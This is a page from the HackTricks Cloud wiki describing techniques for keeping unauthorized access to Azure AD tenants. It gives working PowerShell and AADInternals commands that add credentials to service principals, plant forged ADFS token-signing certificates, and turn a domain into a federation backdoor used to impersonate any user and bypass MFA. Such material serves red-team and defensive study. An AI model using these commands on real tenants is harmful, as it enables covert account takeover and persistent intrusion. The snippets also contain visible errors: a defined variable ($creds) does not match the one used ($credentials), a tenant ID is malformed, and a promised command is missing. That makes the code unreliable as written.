HackTricks Cloud
HackTricks Cloud
Ask or search…
Comment on page

Az - Persistence

Support HackTricks and get benefits!
By default, any user can register an application in Azure AD. So you can register an application (only for the target tenant) that needs high impact permissions with admin consent (an approve it if you are the admin) - like sending mail on a user's behalf, role management etc.T his will allow us to execute phishing attacks that would be very fruitful in case of success.
Moreover, you could also accept that application with your user as a way to maintain access over it.

Applications and Service Principals

With privileges of Application Administrator, GA or a custom role with microsoft.directory/applications/credentials/update permissions, we can add credentials (secret or certificate) to an existing application.
It's possible to target an application with high permissions or add a new application with high permissions.
An interesting role to add to the application would be Privileged authentication administrator role as it allows to reset password of Global Administrators.
This technique also allows to bypass MFA.
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
  • For certificate based authentication
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Federation - Token Signing Certificate

With DA privileges on on-prem AD, it is possible to create and import new Token signing and Token Decrypt certificates that have a very long validity. This will allow us to log-in as any user whose ImuutableID we know.
Run the below command as DA on the ADFS server(s) to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollver and restart the service:
Then, update the certificate information with Azure AD:
Update-AADIntADFSFederationSettings -Domain cyberranges.io

Federation - Trusted Domain

With GA privileges on a tenant, it's possible to add a new domain (must be verified), configure its authentication type to Federated and configure the domain to trust a specific certificate (any.sts in the below command) and issuer:
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true


Support HackTricks and get benefits!